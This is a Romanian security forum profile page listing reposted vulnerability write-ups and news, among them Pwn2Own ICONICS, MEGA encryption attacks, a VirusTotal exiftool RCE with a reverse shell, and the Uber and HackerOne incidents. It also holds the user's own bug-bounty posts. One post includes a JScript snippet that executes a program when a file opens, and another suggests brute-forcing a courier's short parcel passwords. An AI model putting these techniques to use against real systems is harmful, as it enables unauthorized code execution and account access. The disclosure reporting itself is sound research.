Jump to content

akkiliON

Active Members
  • Posts

    1202
  • Joined

  • Last visited

  • Days Won

    61

Everything posted by akkiliON

  1. Un XSS Dom Based in www.intel.com. Din pacate, nu ofera bani pentru aplicatiile web. https://app.intigriti.com/programs/intel/intel/detail Vulnerabilitatea a fost raportata.
      • 1
      • Upvote
  2. @abraxyss - Problema pe care am gasit-o in Outlook, nu am luat bani. Mi-au zis ca a fost identificata de altcineva. https://microsoft.com/en-us/msrc/bounty-online-services?rtc=1 Aici gasesti ce este in scop.
  3. Prologue In 2022, Pwn2Own returned to Miami and was again targeting industrial control systems (ICS) software. I had participated in the inaugural Pwn2Own Miami in 2020 and was eager to participate again this year. My previous work included a nice vulnerability against the Iconics Genesis64 Control Server product. That vulnerability allowed a remote attacker to run arbitrary SQL commands using a custom WCF client. This year I was able to win $20,000 by running arbitrary JScript.NET code! This post will describe the process I took and the vulnerability I found. There were a few changes in the rules for 2022 though. In 2020, a successful entry against the Iconics Genesis64 target had to be launched against the exposed network services. In the new 2022 rules, however, opening a file is now considered a valid attack scenario: This sounded promising as this attack surface was not explored at the previous event and would likely have lots of issues! Installing Iconics Genesis64 After downloading the installation ISO, you install Iconics Genesis64 by running the setup.exe program in the ICONICS_Suite directory. The installer will ask you to restart multiple times and eventually all the dependencies will get installed and configuration begins. I used the default configuration in everything, but was also careful to make sure the demo programs were installed. Installation was the most tedious aspect of this entire effort. Exploring and exploiting the new attack surface I started by searching the file system for examples of the filetypes that Iconics Genesis64 handles by default: For example the “.awxx” file is a XML file and there are a number of example files in the “AlarmWorX64_Examples” folder included in the Iconics Genesis64 GenDemo package: For each file found, I did a quick visual scan looking for interesting data and keywords. Initially, I’m just trying to get a high-level overview of what each file is used for. Ideally, I’d find something like a serialized object stored in a file that would be deserialized when the file is opened. Some of the files are binary file formats. Some are compressed. Again, at this point in the process I’m just quickly scanning files for interesting strings and features, with no real expectations. However, when I scanned the “.gdfx” files the “ScriptCode” and “ScriptCodeManager” tags looked VERY interesting: <gwx:GwxDocument.GwxDocument> <gwx:GwxDocument FileVersion="10.85.141.00" ScanRate="500"> <gwx:GwxDocument.ScriptCodeManager> <script:ScriptCodeManager> <script:ScriptCodeManager.Scripts> <script:ScriptCode Name="ThisDisplayCode" Type="JScriptNet"> <x:XData><![CDATA[ function DebugDump(sender : System.Object, cmdArgs : Ico.Gwx.CommandExecutionEventArgs) { var callback : Ico.Fwx.ClientWrapper.MethodCallDoneDelegate = ThisDocument.CreateDelegate(Ico.Fwx.ClientWrapper.MethodCallDoneDelegate, this, "CallDone"); ThisWindow.FwxClientWrapper.MethodCallAsync(":", "DebugDump", new Object[0], callback, null); } function CallDone(result : Ico.Fwx.ClientWrapper.MethodCallDoneResult) { message : String; message = String.Format("Result: {0}", result.Status.ToString()); if ((result.OutputArguments != null) && (result.OutputArguments.Count > 0)) { path = result.OutputArguments[0].ToString(); message += String.Format("\n\nDump file: {0}", path); } MessageBox.Show(message, "Debug Dump Result", MessageBoxButton.OK); } ]]></x:XData> </script:ScriptCode> <script:ScriptCode Name="JScriptDotNetGlobalVariablesCode" Type="JScriptNet" EditorBrowsable="Never"> <x:XData><![CDATA[ var ThisWindow : Ico.Gwx.GwxRuntimeViewControl; var ThisDocument : Ico.Gwx.GwxDocument; var ThisConfiguration : Ico.Gwx.GwxConfiguration; ]]></x:XData> </script:ScriptCode> </script:ScriptCodeManager.Scripts> </script:ScriptCodeManager> </gwx:GwxDocument.ScriptCodeManager> </gwx:GwxDocument> </gwx:GwxDocument.GwxDocument> This looks like JScript.NET code embedded in the file! This appears to be a feature for adding scripts to projects. However, when I try to open the file I get a “File Access Denied” message: It appears an Iconics user needs to be logged in first before this file will open. I documented this behavior and made a note to check if the JScript code could be executed before the authentication check or if the authentication could be bypassed, but then continued my survey of default file types. When I examined a GraphWorX64 Template file, “.tdfx”, I saw the same “ScriptCodeManager” tag and the file opened without requiring authentication: Adding the following code into a “ScriptCode” tag in the template file causes calc to be executed when the file is opened! var objShell = new ActiveXObject("Shell.Application"); objShell.ShellExecute("calc.exe", "", "calc.exe", "open", 0); To Submit or Not Submit Obviously, this is a pretty shallow bug and is a very weak bug to bring to Pwn2Own. There is a high likelihood that other researchers would find this bug and collide. I only had a couple hours of effort in at this point and had to make a decision to go with this bug or to immediately report this bug to ZDI and continue searching for better bugs. The decision was complicated further when the contest was delayed a few months because of the Omicron surge in Florida. Ultimately, my laziness and the busyness of life prevailed. I decided to take my chances with this weak bug. In the end, despite being the fifth (of 7 total) researchers to target Iconics Genesis64, the bug did not collide with previous attempts and was successful! Conclusion In this post I presented a vulnerability in the ICONICS Genesis64 Control Server’s handling of TDFX files. I also showed the simple process to find “new” attack surface in the code. Unfortunately, identifying attack surface that has not seen significant scrutiny is oftentimes all that is necessary to find and exploit critical vulnerabilities. ZDI assigned CVE-2022-33317 to this vulnerability and ICONICS fixed it in version 10.97.2. Thanks to the vendor for the timely fix and thanks to ZDI for organizing another great Pwn2Own! Source: https://trenchant.io/two-lines-of-jscript-for-20000-pwn2own-miami-2022/
  4. Vulnerabilitatea din [*].live.com. Azi am primit mesaj. Nu ma asteptam asa repede la un raspuns. 🙂 L.E: Au si reparat-o... LOL. Am verificat acum 😅
  5. O sa revin cu un mesaj cand primesc vreo noutate.... O sa dureze sigur ceva timp.... Mersi ! Asta l-am gasit si eu si am vrut sa il raportez pentru HoF macar. Daca l-ai gasit si tu si ti-au zis ca e out-of-scope.... nu mai are rost.... 😅 Ma nO_Ob, pe tine cine te-o pus sa stai... treci la munci 😂
  6. Salut. Am gasit doua vulnerabilitati XSS in aplicatiile detinute de cei de la Microsoft. Una este in Outlook, iar a doua intr-o alta aplicatie folosita si cunoscuta de multi... nu pot da detalii momentan deoarece nu a fost rezolvata nici una pana acum... Cel putin, nu am primit duplicat pe rapoartele trimise. 🙂 1. XSS reflected (without user interaction) - [*].live.com: 2. XSS reflected (user interaction required) - Outlook: Am observat ca si domeniile acestea sunt vulnerabile: office365.com si live.com.
  7. Ride hailing giant Uber disclosed Thursday it's responding to a cybersecurity incident involving a breach of its network and that it's in touch with law enforcement authorities. The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter. The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach. The publication said the malicious intruder compromised an employee's Slack account, and leveraged it to broadcast a message that the company had "suffered a data breach," in addition to listing internal databases that's supposed to have been compromised. "It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees," the New York Times said. Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be an 18-year-old teenager, social-engineered the employee to get hold of their password by masquerading as a corporate IT person and used it to obtain a foothold into the internal network. "Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface," Kevin Reed, chief information security officer at Acronis, told The Hacker News. This is not Uber's first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and ultimately paying off the hackers $100,000 to hide the breach. It became public knowledge only in late 2017. Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had "instructed his team to keep knowledge of the 2016 breach tightly controlled." Sullivan has contested the accusations. In December 2021, Sullivan was handed down additional three counts of wire fraud to previously filed felony obstruction and misprision charges. "Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack," the superseding indictment said. It further said he "took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach." The latest breach also comes as the criminal case against Sullivan went to trial in the U.S. District Court in San Francisco. "The compromise is certainly bigger compared to the breach in 2016," Reed said. "Whatever data Uber keeps, the hackers most probably already have access." Source: https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html
      • 1
      • Like
  8. Company says it is making changes to its security controls to prevent malicious insiders from doing the same thing in future; reassures bug hunters their bounties are safe. HackerOne has fired one of its employees for collecting bug bounties from its customers after alerting them to vulnerabilities in their products — bugs that had been found by other researchers and disclosed privately to HackerOne via its coordinated vulnerability disclosure program. HackerOne discovered the caper when one of its customers asked the organization to investigate a vulnerability disclosure that was made outside the HackerOne platform in June. The customer, like other clients of bug bounty programs, uses HackerOne to collect and report vulnerabilities in its products that independent security researchers might have discovered. In return, the company pays a reward — or bug bounty — for reported vulnerabilities. In this instance, the HackerOne customer said an anonymous individual had contacted them about a vulnerability that was very similar to another bug in its technology that a researcher had previously submitted via the HackerOne platform. Bug collisions — where two or more researchers might independently unearth the same vulnerability — are not uncommon. "However, this customer expressed skepticism that this was a genuine collision and provided detailed reasoning," HackerOne said in a report summarizing the incident. The customer described the individual — who used the handle "rzlr" — as using intimidating language in communicating information about the vulnerability, HackerOne said. Malicious Insider The company's investigation of the June 22, 2022, tip almost immediately pointed to multiple customers likely being contacted in the same manner. HackerOne researchers began probing every scenario where someone might have gained access to its vulnerability disclosure data: whether someone might have compromised one of its systems, gained remote access some other way, or if the disclosure had resulted from a misconfiguration. The data quickly pointed to the threat actor being an insider with access to the vulnerability data. HackerOne's investigators then looked at their log data on employee access to vulnerability disclosures and found that just one employee had accessed each of the disclosures that customers reported as being suspicious. "Within 24 hours of the tip from our customer, we took steps to terminate that employee's system access and remotely locked their laptop pending further investigation," HackerOne said. The company found the former employee had created a fictitious HackerOne account and collected bounties for a handful of disclosures. HackerOne worked with the relevant payment providers in each instance to confirm the bounties were paid into a bank account connected with the now-former employee. By analyzing the individual's network traffic, the investigators were also able to link the fictitious account to the ex-employee's primary HackerOne account. Undermining Trust Mike Parkin, senior technical engineer at Vulcan Cyber, says incidents like this can undermine the trust that is key to the success of crowdsourced vulnerability disclosure programs such as the one that HackerOne manages. "Trust is a big factor in vulnerability research and can play a large part in many bug bounty programs," Parkin says. "So, when someone effectively steals another researcher's work and presents it as their own, that foundational trust can be stretched." Parkin praised HackerOne for being transparent and acting quickly to address the situation. "Hopefully this incident won't affect the vulnerability research ecosystem overall, but it may lead to deeper reviews of bug bounty submissions going forward," he says. HackerOne said the former employee — who started only on April 4 — directly communicated with a total of seven of its customers. It urged any other customers that might have been contacted by an individual using the handle rzlr to contact the company immediately, especially if the communication had been aggressive or threatening in tone. The company also reassured hackers who have signed up for the platform that their eligibility for any bounties they might receive for vulnerability disclosures had not been adversely impacted. "All disclosures made from the threat actor were considered duplicates. Bounties applied to these submissions did not impact the original submissions." HackerOne said it would contact hackers whose reports the ex-employee might have accessed and attempted to resubmit. "Since the founding of HackerOne, we have honored our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer Internet," the company said. Following the incident, HackerOne has identified several areas where it plans to bolster controls. These include improvements to its logging capabilities, adding employees to monitor for insider threats, enhancing its employee screening practices during the hiring process, and controls for isolating data to limit damage from incidents of this type. Jonathan Knudsen, head of global research at Synopsys Cybersecurity Research Center, says HackerOne's decision to communicate clearly about the incident and its response to it is an example of how organizations can limit damage. "Security incidents are often viewed as embarrassing and irredeemable," he says. But being completely transparent about what happened can increase credibility and garner respect from customers. "HackerOne has taken an insider threat incident and responded in a way that reassures customers that they take security very seriously, are capable of responding quickly and effectively, and are continuously examining and improving their processes," Knudsen says. Source: https://www.darkreading.com/vulnerabilities-threats/hackerone-employee-fired-for-stealing-and-selling-bug-reports-for-personal-gain
  9. The LockBit 3.0 ransomware operation was launched recently and it includes a bug bounty program offering up to $1 million for vulnerabilities and various other types of information. LockBit has been around since 2019 and the LockBit 2.0 ransomware-as-a-service operation emerged in June 2021. It has been one of the most active ransomware operations, accounting for nearly half of all ransomware attacks in 2022, with more than 800 victims being named on the LockBit 2.0 leak website. The cybercriminals are encrypting files on compromised systems and also stealing potentially valuable information that they threaten to make public if the victim refuses to pay up. With the launch of LockBit 3.0, it seems they are reinvesting some of the profit in their own security via a “bug bounty program”. Similar to how legitimate companies reward researchers to help them improve their security, LockBit operators claim they are prepared to pay out between $1,000 and $1 million to security researchers and ethical or unethical hackers. Rewards can be earned for website vulnerabilities, flaws in the ransomware encryption process, vulnerabilities in the Tox messaging app, and vulnerabilities exposing their Tor infrastructure. They are also prepared to reward “brilliant ideas” on how to improve their site and software, as well as information on competitors. Addressing these types of security holes can help protect the cybercrime operation against researchers and law enforcement. One million dollars are offered to anyone who can dox — find the real identity — of a LockBit manager known as “LockBitSupp”, who is described as the “affiliate program boss”. This bounty has been offered since at least March 2022. Major ransomware groups are believed to have made hundreds of millions and even billions of dollars, which means the LockBit group could have the funds needed for such a bug bounty program. “With the fall of the Conti ransomware group, LockBit has positioned itself as the top ransomware group operating today based on its volume of attacks in recent months. The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,” commented Satnam Narang, senior staff research engineer at Tenable. However, John Bambenek, principal threat hunter at security and operations analytics SaaS company Netenrich, said he doubts the bug bounty program will get many takers. “I know that if I find a vulnerability, I’m using it to put them in prison. If a criminal finds one, it’ll be to steal from them because there is no honor among ransomware operators,” Bambenek said. Casey Ellis, founder and CTO of bug bounty platform Bugcrowd, noted that “the same way hackers aren't always ‘bad’, the bounty model isn't necessarily ‘only useful for good’.” Ellis also pointed out, “Since Lockbit 3.0's bug bounty program essentially invites people to add a felony in exchange for a reward, they may end up finding that the $1,000 low reward is a little light given the risks involved for those who might decide to help them.” Other new features introduced with the launch of LockBit 3.0 include allowing victims to buy more time or “destroy all information”. The cybercriminals are also offering anyone the option to download all files stolen from a victim. Each of these options has a certain price. Vx-underground, a service that provides malware samples and other resources, also noted that the harassment of victims is now also encouraged. South Korean cybersecurity firm AhnLab reported last week that the LockBit ransomware has been distributed via malicious emails claiming to deliver copyright claims. “Lures like this one are simple and effective, although certainly not unique,” said Erich Kron, security awareness advocate at KnowBe4. “Like so many other phishing attacks, this is using our emotions, specifically the fear of a copyright violation, which many people have heard can be very costly, to get a person to make a knee-jerk reaction.” Source: https://www.securityweek.com/lockbit-30-ransomware-emerges-bug-bounty-program
      • 2
      • Upvote
  10. MEGA is a leading cloud storage platform with more than 250 million users and 1000 Petabytes of stored data, which aims to achieve user-controlled end-to-end encryption. We show that MEGA's system does not protect its users against a malicious server and present five distinct attacks, which together allow for a full compromise of the confidentiality of user files. Additionally, the integrity of user data is damaged to the extent that an attacker can insert malicious files of their choice which pass all authenticity checks of the client. We built proof-of-concept versions of all the attacks, showcasing their practicality and exploitability. Background MEGA is a cloud storage and collaboration platform founded in 2013 offering secure storage and communication services. With over 250 million registered users, 10 million daily active users and 1000 PB of stored data, MEGA is a significant player in the consumer domain. What sets them apart from their competitors such as DropBox, Google Drive, iCloud and Microsoft OneDrive is the claimed security guarantees: MEGA advertise themselves as the privacy company and promise User-Controlled end-to-end Encryption (UCE). We challenge these security claims and show that an adversarial service provider, or anyone controlling MEGA’s core infrastructure, can break the confidentiality and integrity of user data. Key Hierarchy At the root of a MEGA client’s key hierarchy, illustrated in the figure below, is the password chosen by the user. From this password, the MEGA client derives an authentication key and an encryption key. The authentication key is used to identify users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. For every account, this key material includes a set of asymmetric keys consisting of an RSA key pair (for sharing data with other users), a Curve25519 key pair (for exchanging chat keys for MEGA’s chat functionality), and a Ed25519 key pair (for signing the other keys). Furthermore, for every file or folder uploaded by the user, a new symmetric encryption key called a node key is generated. The private asymmetric keys and the node keys are encrypted by the client with the master key using AES-ECB and stored on MEGA’s servers to support access from multiple devices. A user on a new device can enter their password, authenticate to MEGA, fetch the encrypted key material, and decrypt it with the encryption key derived from the password. Attacks RSA Key Recovery Attack MEGA can recover a user's RSA private key by maliciously tampering with 512 login attempts. Plaintext Recovery MEGA can decrypt other key material, such as node keys, and use them to decrypt all user communication and files. Framing Attack MEGA can insert arbitrary files into the user's file storage which are indistinguishable from genuinely uploaded ones. Integrity Attack The impact of this attack is the same as that of the framing attack, trading off less stealthiness for easier pre-requisites. GaP-Bleichenbacher Attack MEGA can decrypt RSA ciphertexts using an expensive padding oracle attack. RSA Key Recovery Attack MEGA uses RSA encryption for sharing node keys between users, to exchange a session ID with the user at login and in a legacy key transfer for the MEGA chat. Each user has a public RSA key pksharepkshare used by other users or MEGA to encrypt data for the owner, and a private key skshareskshare used by the user themselves to decrypt data shared with them. The private RSA key is stored for the user in encrypted form on MEGA’s servers. Key recovery means that an attacker successfully gets possession of the private key of a user, allowing them to decrypt ciphertexts intended for the user. We discovered a practical attack to recover a user’s RSA private key by exploiting the lack of integrity protection of the encrypted keys stored for users on MEGA’s servers. An entity controlling MEGA’s core infrastructure can tamper with the encrypted RSA private key and deceive the client into leaking information about one of the prime factors of the RSA modulus during the session ID exchange. More specifically, the session ID that the client decrypts with the mauled private key and sends to the server will reveal whether the prime is smaller or greater than an adversarially chosen value. This information enables a binary search for the prime factor, with one comparison per client login attempt, allowing the adversary to recover the private RSA key after 1023 client logins. Using lattice cryptanalysis, the number of login attempts required for the attack can be reduced to 512. Proof of Concept Attack Since the server code is not published, we cannot implement a Proof-of-Concept (PoC) in which the adversary actually controls MEGA. Instead, we implemented a MitM attack by installing a bogus TLS root certificate on the victim. This setup allows the attacker to impersonate MEGA towards the user while using the real servers to execute the server code (which is unknown to us). Server responses can be patched on the fly since they do not rely on secrets stored by the server, allowing the attack to be performed in real time as the victim interacts with MEGA. The following video shows how our attack recovers the first byte of the RSA private key. Afterward, we abort the attack to avoid any adverse impact on MEGA’s production servers. For each recovered bit, the attack consists of the following steps: The victim logs in. The adversary hijacks the login and replaces the correct session ID with their probe for the next secret bit. Based on the client’s response, the adversary updates its interval for the binary search of the RSA prime factor. The login fails for the victim. This is only a limitation of the MitM setup, since the correct SID is lost. An adversarial cloud storage provider can simply accept the returned SID. Note that after aborting the attack, the search interval is [0xe03ff...f, 0xe07ff...f]. The secret prime factor qq of the RSA modulus starts with 0xe06.... This value is within the search interval and the adversary already recovered the first byte 0xe0. Using all of qq, the adversary can recover the RSA private key (d,N)(d,N) using the public key (e,N)(e,N) as p=N/qp=N/q and d=e−1mod(p−1)(q−1)d=e−1mod(p−1)(q−1). Video: https://mega-awry.io/videos/rsa_key_recovery_poc.mp4 Plaintext Recovery As shown in the key hierarchy MEGA clients encrypt the private keys for sharing, chat key transfer, and signing with the master key using AES-ECB. Furthermore, file and folder keys also use the same encryption. A plaintext recovery attack lets the adversary compute the plaintext from a given ciphertext. In this specific attack, MEGA can decrypt AES-ECB ciphertexts created with a user’s master key. This gives the attacker access to the aforementioned and highly sensitive key material encrypted in this way. With the sharing, chat, signing, and node keys of a user, the adversary can decrypt the victim’s data or impersonate them. This attack exploits the lack of key separation for the master key and knowledge of the recovered RSA private key (e.g., from the RSA key recovery attack). The decryption oracle again arises during authentication, when the encrypted RSA private key and the session ID (SID), encrypted with the RSA public key, is sent from MEGA’s servers to the user. MEGA can overwrite part of the RSA private key ciphertext in the SID exchange with two target ciphertext blocks. It then uses the SID returned by the client to recover the plaintext for the two target blocks. Since all key material is protected with AES-ECB under the master key, an attacker exploiting this vulnerability can decrypt node keys, the victim’s Ed25519 signature key, its Curve25519 chat key, and, thus, also all exchanged chat keys. Given that the private RSA key has been recovered, one client login suffices to recover 32 bytes of encrypted key material, corresponding, for instance, to one full node key. Framing Attack This attack allows MEGA to forge data in the name of the victim and place it in the target’s cloud storage. While the previous attacks already allow an adversary to modify existing files using the compromised keys, this attack allows the adversary to preserve existing files or add more documents than the user currently stores. For instance, a conceivable attack might frame someone as a whistle-blower and place an extensive collection of internal documents in the victim’s cloud storage. Such an attack might gain credibility when it preserves the user’s original cloud content. To create a new file key, the attacker makes use of the particular format that MEGA uses for node keys. Before they are encrypted, node keys are encoded into a so called obfuscated key object, which consists of a reversible combination of the node key and information used for decryption of the file or folder. (Specifically, a nonce and a truncated MAC tag.) Since none of our attacks allow an attacker to encrypt values of their choosing with AES-ECB under the master key, the attacker works in the reverse direction to create a new valid obfuscated key object. That is, it first obtains an obfuscated key by decrypting a randomly sampled key ciphertext using the plaintext recovery attack. Note that this ciphertext can really be randomly sampled from the set of all bit strings of the length of one encrypted obfuscated key object. Decryption will always succeed, since the AES-ECB encryption mode used to encrypt key material does not provide any means of checking the integrity of a ciphertext. The resulting string is not under the control of the adversary and will be random-looking, but can regardless be used as a valid obfuscated key object since both file keys and the integrity information (nonces and MAC tags) can be arbitrary strings. Hence, the adversary parses the decrypted string into a file key, a nonce and MAC tag. It then modifies the target file which is to be inserted into the victim’s cloud such that it passes the integrity check when the file key and integrity information from the obfuscated key is used. The attacker achieves this by inserting a single AES block in the file at a chosen location. Finally, the adversary uses the known file key to encrypt the file and uploads the result to the victim’s cloud. Many standard file formats such as PNG and PDF tolerate 128 injected bits (for instance, in the file’s metadata, as trailing data, or in unused structural components) without affecting the displayed content. The image above shows the file our proof of concept inserts in the victim account. Our attack added the highlighted bytes to satisfy the integrity check. Due to the structure of PNG files, these bytes do not change the displayed pixels, i.e., it is visually identical to the unmodified image. Proof-of-Concept Attack The PoC shows our framing attack in the MitM setting described in the RSA private key recovery attack. The video shows the following steps: The victim logs into their account without any attack running. There are only three files in the cloud storage and none of them is called hacker-cat.png. The victim logs out and the adversary runs the plaintext recovery attack once. This involves the following steps: The adversary hijacks the victim’s login attempt and replaces the encrypted SID with the encrypted key that it picked for the file forgery. The victim’s client responds with the decrypted SID, from which the adversary can recover the plaintext for the injected ciphertext blocks. The log in attempt fails, which is only a limitation of the MitM setting. A malicious cloud provider can perform this attack without the user noticing. The adversary uses the key recovered in the previous step to forge an encrypted file. The victim logs in again. The adversary injects the forged file into the loaded file tree. The victim’s cloud now displays four files, including a new file called hacker-cat.png. When the user views this file in the browser, it correctly decrypts and shows the image. Video: https://mega-awry.io/videos/framing_attack_poc.mp4 Integrity Attack This attack exploits the peculiar structure of MEGA’s obfuscated key objects to manipulate an encrypted node key such that the decrypted key consists of all zero bytes. Since the attacker now knows the key, this key manipulation can be used to forge a file in a manner similar to the framing attack. Unlike for the framing attack (which requires the ability to decrypt arbitrary AES-ECB ciphertexts), for this attack the adversary only needs access to a single plaintext block and the corresponding ciphertext encrypted with AES-ECB under the master key. For instance, the attacker can use MEGA’s protocol for public file sharing to obtain the pair: when a user shares a file or folder publicly, they create a link containing the obfuscated key in plaintext. Hence, a malicious cloud provider who obtains such a link knows both the plaintext and the corresponding ciphertext for the node key, since the latter is uploaded to MEGA when the file was created (before being shared). This can then be used as the starting point for the key manipulation and allows a forged file ciphertext to be uploaded into the victim’s cloud, just as for the framing attack. However, this attack is less surreptitious than the framing attack because of the low probability of the all-zero key appearing in an honest execution, meaning that an observant user who inspects the file keys stored in their account could notice that the attack has been performed. GaP-Bleichenbacher Attack This attack is a novel variant of Bleichenbacher’s attack on PKCS#1 v1.5 padding. We call it a Guess-and-Purge (GaP) Bleichenbacher attack. MEGA can use this attack to decrypt RSA ciphertexts by exploiting a padding oracle in the fallback chat key exchange of MEGA’s chat functionality. The vulnerable RSA encryption is used for sharing node keys between users, to exchange a session ID with the user at login and in a legacy key transfer for the MEGA chat. As shown in the key hierarchy, each user has a public RSA key used by other users or MEGA to encrypt data for the owner, and a private key used by the user themselves to decrypt data shared with them. With this attack, MEGA can decrypt these RSA ciphertexts, albeit requiring an impractical number of login attempts. Attack idea: The original Bleichenbacher attack maintains an interval for the possible plaintext value of a target ciphertext. It exploits the malleability of RSA to test the decryption of multiples of the unknown target message. Successful unpadding leaks the prefix of the decrypted message due to the structure of the PKCS#1 v1.5 padding. This prefix allows an adversary to reduce intervals efficiently and recover the plaintext. MEGA uses a custom padding scheme which is less rigid than PKCS#1 v1.5. This makes it challenging to apply Bleichenbacher’s attack, because a successful unpadding no longer corresponds to a single solution interval. Instead many disjoint intervals are possible, depending on the value of an unknown prefix in MEGA’s padding scheme. Our attack devices a new Guess-and-Purge strategy that guesses the unknown prefix and quickly purges wrong guesses. This enables us to perform a search for the decryption of a ciphertext in 216.9216.9 client login attempts on average. Although this attack is weaker than the RSA key recovery attack (in the sense that a key recovery implies plaintext recovery), it is complementary in the vulnerabilities that it exploits and requires different attacker capabilities. It attacks the legacy chat key decryption of RSA encryption instead of the session ID exchange and can be performed by a slightly weaker adversary since no key-overwriting is necessary. The details of the GaP-Bleichenbacher attack are intricate. For a full description, see Appendix B of the paper. Sources: https://mega-awry.io/ https://thehackernews.com/2022/06/researchers-uncover-ways-to-break.html https://blog.mega.io/mega-security-update/
      • 2
      • Upvote
  11. Despite the old saying, not everything lives forever on the internet — including stolen crypto. This week, crypto security firm BlockSec announced that a hacker figured out how to exploit lending agreements and triple their crypto reward on the ZEED DeFi protocol, which runs on the Binance Smart Chain and trades with a currency called YEED. “Our system detected an attack transaction that exploited the reward distribution vulnerability in ZEED,” BlockSec said on Twitter this week. The end of the thread threw readers for a loop, though, because BlockSec also said the stolen currency had been permanently lost because of a self-destruct feature the hacker used. “Interestingly, the attacker does not transfer the obtained tokens out before self-destructing the attack contract. Probably, he/she was too excited,” BlockSec said in a following tweet. Possible Vigilante The sheer thought of losing a million dollars is enough to make anybody sweat bullets, but it’s possible the hacker did this on purpose. BlockSec isn’t sure what the motive was, and suggests it could’ve been an accident. A report by VICE published this week says the hacker could’ve been a vigilante with a message or something to prove. Because the self-destruct feature “burned” the tokens, they’re essentially gone forever. VICE suggests the hacker could’ve wanted to watch the crypto world burn — and the mysterious attacker certainly did cause a lot of chaos. After selling the hacked tokens, YEED’s value crashed to near zero. Sales won’t resume until ZEED takes steps to secure, repair and test its systems. Maybe the hacker messed up, or maybe we just witnessed a modern day Robin Hood attack. It’s possible we’ll never know who pulled off the hack, or why. Source: https://futurism.com/the-byte/hacker-steals-destroys Dorele, ce făcuși..... 😂
  12. A security vulnerability has been disclosed in the web version of the Ever Surf wallet that, if successfully weaponized, could allow an attacker to gain full control over a victim's wallet. "By exploiting the vulnerability, it's possible to decrypt the private keys and seed phrases that are stored in the browser's local storage," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "In other words, attackers could gain full control over the victim's wallets." Ever Surf is a cryptocurrency wallet for the Everscale (formerly FreeTON) blockchain that also doubles up as a cross-platform messenger and allows users to access decentralized apps as well as send and receive non-fungible tokens (NFTs). It's said to have an estimated 669,700 accounts across the world. By means of different attack vectors like malicious browser extensions or phishing links, the flaw makes it possible to obtain a wallet's encrypted keys and seed phrases that are stored in the browser's local storage, which can then be trivially brute-forced to siphon funds. Given that the information in the local storage is unencrypted, it could be accessed by rogue browser add-ons or information-stealing malware that's capable of harvesting such data from different web browsers. Following responsible disclosure, a new desktop app has been released to replace the vulnerable web version, with the latter now marked as deprecated and used only for development purposes. "Having the keys means full control over the victim's wallet, and, therefore funds," Check Point's Alexander Chailytko said. "When working with cryptocurrencies, you always need to be careful, ensure your device is free of malware, do not open suspicious links, keep OS and anti-virus software updated." "Despite the fact that the vulnerability we found has been patched in the new desktop version of the Ever Surf wallet, users may encounter other threats such as vulnerabilities in decentralized applications, or general threats like fraud, [and] phishing." Source: https://thehackernews.com/2022/04/critical-bug-in-everscale-wallet.html
  13. After a deep security research by Cysource research team led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within VirusTotal platform and gain access to its various scans capabilities. About virustotal: The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use the CVE-2021-22204 so that these scanners would execute the payload as soon as the exiftool was executed. Technical part: The first step was uploading a djvu file to the page https://www.virustotal.com/gui/ with the payload: Virustotal.com analyzed my file and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at the link: https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works , virustotal.com uses several scans. The application sent our file with the payload to several hosts to perform the scan. On virustotal hosts, at the time that exiftool is executed, according to CVE-2021-22204 inform, instead of exiftool detecting the metadata of the file it executes our payload. Handing us a reverse shell on our machine. After that we noticed that it’s not just a Google-controlled environment, but environments related to internal scanners and partners that assist in the virustotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges. Hosts identified within the internal network: The interesting part is every time we uploaded a file with a new hash containing a new payload, virustotal forwarded the payload to other hosts. So, not just we had a RCE, but also it was forwarded by Google's servers to Google's internal network, it customers and partners. Various types of services were found within the networks, such as: mysql, Kubernetes, oracle database, http and https applications, metrics applications, SSH, etc. Due to this unauthorized access, it was possible to obtain sensitive and critical information such as: Kubernetes tokens and certificates, service settings info, source codes, Logs, etc. We reported all the findings to Google that fixed this issue quickly. Disclosure Process: Report received by GoogleVRP - 04.30.2021 GoogleVRP trigged the report - 05.19.2021 GoogleVRP accepted the report as a valid report - 21.05.2021 GoogleVRP closed the report - 04.06.2021 Virustotal was no longer vulnerable - 13.01.2022 GoogleVRP allowed publishing - 15.01.2022 Source: https://www.cysrc.com/blog/virus-total-blog
      • 8
      • Upvote
      • Haha
  14. Hackers: https://breached.co/index.php ---------------------------------------------
  15. akkiliON

    Gls.ro IDOR

    Da-le un e-mail daca vrei si vezi ce iti spun. Cred ca poti sa le trimiti un mesaj aici: https://gls-group.eu/GROUP/en/gls_informs/safety_advice_1606mmeaxqozb E-mail: security@gls-group.eu Eu din ce imi amintesc, am raportat acum cativa ani o vulnerabilitate la Canon si au fixat problema... n-am primit nici un raspuns de la ei sau sa spuna multumesc macar. 🙃 Chiar am de primit un colet de la ei astazi 😅.... cum a spus @SirGod, parola este din 4 caractere.... asta am observat si eu in SMS-ul pe care l-am primit..... Vezi daca merge brute-force attack.... eu nu am testat. EDIT: Defapt, parola pe care am primit-o eu este din 5 caractere.... my bad. 😄
